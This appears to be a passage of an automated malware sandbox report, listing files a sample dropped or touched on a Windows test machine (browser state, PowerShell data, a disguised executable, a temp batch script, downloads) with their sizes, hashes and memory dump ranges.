                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                    Filesize

                                                                    11KB

                                                                    MD5

                                                                    3d9e6bcf7aad206efbe65f2c45528c59

                                                                    SHA1

                                                                    17aed91069c5a7354377a48e290e533b2c921645

                                                                    SHA256

                                                                    8ae9bb79e0037b515fc5d55e203c31864f06c683d9e0c21d6477867a609590fa

                                                                    SHA512

                                                                    f4bac6ed96c9f009496e8c5984e033d2be2824157b1705851cd95edf356e216cb30a6fa8ff95d19bc87489ab6c35f392ce3ea4d8196e4545531541e5197ece5f

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    1a9fa92a4f2e2ec9e244d43a6a4f8fb9

                                                                    SHA1

                                                                    9910190edfaccece1dfcc1d92e357772f5dae8f7

                                                                    SHA256

                                                                    0ee052d5333fd5fd86bc84856fec98e045f077a7ac8051651bf7c521b9706888

                                                                    SHA512

                                                                    5d2361476fa22200e6f83883efe7dcb8c3fe7dae8d56e04e28a36e9ae1270c327b6aa161d92b239593da7661289d002c574446ecfd6bd19928209aae25e3ef64

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                    Filesize

                                                                    944B

                                                                    MD5

                                                                    050567a067ffea4eb40fe2eefebdc1ee

                                                                    SHA1

                                                                    6e1fb2c7a7976e0724c532449e97722787a00fec

                                                                    SHA256

                                                                    3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e

                                                                    SHA512

                                                                    341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\SteamConfig\070703032520.exe
                                                                    Filesize

                                                                    81KB

                                                                    MD5

                                                                    8941701e94db9223bd95445b90cb7677

                                                                    SHA1

                                                                    0539f1a8adbd34b52d9c2ce2ac9c3b6b7f96e24d

                                                                    SHA256

                                                                    f561a6055febf79fd6cc3a3a0613d93673cc7da0f7b48e35b743898dae673cae

                                                                    SHA512

                                                                    4b579e2ff7a58b5d9d558f933c3decb45ab4a74e41b7c7a611e7ca42f33828c2b4e9aa7e82ade2cc0e009ce66330fbb1936832ba4d7d025b90cc7be30d026858

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_a52uxeyx.3wc.ps1
                                                                    Filesize

                                                                    60B

                                                                    MD5

                                                                    d17fe0a3f47be24a6453e9ef58c94641

                                                                    SHA1

                                                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                    SHA256

                                                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                    SHA512

                                                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                    Download Submit

                                                                  • C:\Users\Admin\AppData\Local\Temp\temp_script.bat
                                                                    Filesize

                                                                    1KB

                                                                    MD5

                                                                    c78d5ee407671789a80841c5d2529583

                                                                    SHA1

                                                                    28de1492fde433ddea8fdbc6d1ec1728fee2fd31

                                                                    SHA256

                                                                    833dc07fe263af2a3b7fa83261f9ff07c562e43dce62469023e6a67d919edf52

                                                                    SHA512

                                                                    34853c127393cae13df38d4e7c650103db5982b8f6dcb33e91be2d5cea8b8cc91fbf92dc6504cd4bbb8020828b0e28a548ea45a31620b7b9bb096c00a913c454

                                                                    Download Submit

                                                                  • C:\Users\Admin\Downloads\Unconfirmed 468199.crdownload
                                                                    Filesize

                                                                    9.6MB

                                                                    MD5

                                                                    849e3eb24ce6744ca6ca8c69647aeade

                                                                    SHA1

                                                                    7ed9be189e573d370040f3e8b370912cefbcfcb8

                                                                    SHA256

                                                                    e4aaa98ef05c43ac9b1d83eebe81fadbaf0bc2309108e06b755d1c0672a13ee0

                                                                    SHA512

                                                                    9ffb5d154309777601cfab4774c6823a302a24e73e4778bac2646e2221383d7d7cf62ea92431bee3d931016a34a407cd951c9b4f34ae8698fa7383244d170d41

                                                                    Download Submit

                                                                  • C:\Users\Admin\Downloads\Unconfirmed 994398.crdownload
                                                                    Filesize

                                                                    3.5MB

                                                                    MD5

                                                                    92aa65e0dc3c061e2be6c8483ddf42f7

                                                                    SHA1

                                                                    f09e919eb1ab50310553997e5f72263239251101

                                                                    SHA256

                                                                    6bc6dcee6c2859d17f92b617333e2d159622be4458632e0cf3c0757867f7381e

                                                                    SHA512

                                                                    28480271b2ee4f77ad970209f8fc48db77d0ace7d5b3ba8a8e6eec57942d2f0e105a6dc6f6fc535837f706eb1eb609cee03b7d280abdc565bb26866e0c87673c

                                                                    Download Submit

                                                                  • C:\Users\Admin\Downloads\s.exe:Zone.Identifier
                                                                    Filesize

                                                                    80B

                                                                    MD5

                                                                    5999daaf5a173bdc44b0584d56b57c11

                                                                    SHA1

                                                                    ab6c9a5a625d5c6fbf0ed2c8dddc98307188215e

                                                                    SHA256

                                                                    36c0294ea30e5dd9c7a008137ddf9b93004823246d37166b1aea5efd2ef93060

                                                                    SHA512

                                                                    5987fda497df0ea4efd431f47c4d390d73181d1c2b99bb045875a902a046c4ace4f3bfe394a9fc43ac047af731a3d7002fc8c3e0434469cc95d690802efa88d1

                                                                    Download Submit

                                                                  • C:\Users\Admin\Downloads\somethingbadisonthemoonwindows.zip:Zone.Identifier
                                                                    Filesize

                                                                    26B

                                                                    MD5

                                                                    fbccf14d504b7b2dbcb5a5bda75bd93b

                                                                    SHA1

                                                                    d59fc84cdd5217c6cf74785703655f78da6b582b

                                                                    SHA256

                                                                    eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

                                                                    SHA512

                                                                    aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

                                                                    Download Submit

                                                                  • memory/2360-433-0x0000000000090000-0x00000000000AA000-memory.dmp

                                                                    Filesize

                                                                    104KB

                                                                    Download

                                                                  • memory/3928-457-0x00007FF7030D0000-0x00007FF703250000-memory.dmp

                                                                    Filesize

                                                                    1.5MB

                                                                    Download

                                                                  • memory/4500-418-0x000002C1BCD70000-0x000002C1BCD92000-memory.dmp

                                                                    Filesize

                                                                    136KB

                                                                    Download

                                                                  • memory/4920-445-0x00000141392C0000-0x000001413940F000-memory.dmp

                                                                    Filesize

                                                                    1.3MB

                                                                    Download

                                                                  • memory/4924-456-0x0000021BFB300000-0x0000021BFB44F000-memory.dmp

                                                                    Filesize

                                                                    1.3MB

                                                                    Download